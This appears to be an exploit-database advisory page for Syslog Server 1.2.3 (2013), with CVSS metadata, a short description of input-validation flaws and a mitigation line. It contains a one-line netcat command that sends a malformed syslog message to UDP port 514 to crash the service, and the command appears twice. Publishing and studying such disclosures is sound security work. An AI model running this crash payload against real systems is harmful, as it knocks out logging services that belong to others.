header-logo
Suggest Exploit
vendor:
Syslog Server
by:
npn
7,5
CVSS
HIGH
Validation Errors
20
CWE
Product Name: Syslog Server
Affected Version From: 1.2.3
Affected Version To: 1.2.3
Patch Exists: NO
Related CWE: N/A
CPE: a:ghuysmans:syslog_server:1.2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 English
2013

Syslog Server 1.2.3

This software suffers validation errors throughout the basic protocol implementation making it possible to cause overflows, type mismatches and so on. Here is a type mismatch crash: echo "<pwn>pwn"|nc -u 192.168.200.20 514

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to control the program flow of the application.
Source

Exploit-DB raw data:

#!/usr/bin/python


#Exploit Title: Syslog Server 1.2.3
#Date: 12th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Vendor Homepage: http://sourceforge.net/users/ghuysmans
#Software Link: http://download.cnet.com/Syslog-Server/3000-2085_4-75868875.html
#Version: 1.2.3
#Tested on: Windows XP SP3 English


This software suffers validation errors throughout the basic protocol implementation making it possible to cause overflows, type mismatches and so on. Here is a type mismatch crash:


echo "<pwn>pwn"|nc -u 192.168.200.20 514

Navigation

Suggest Exploit

Services By CQR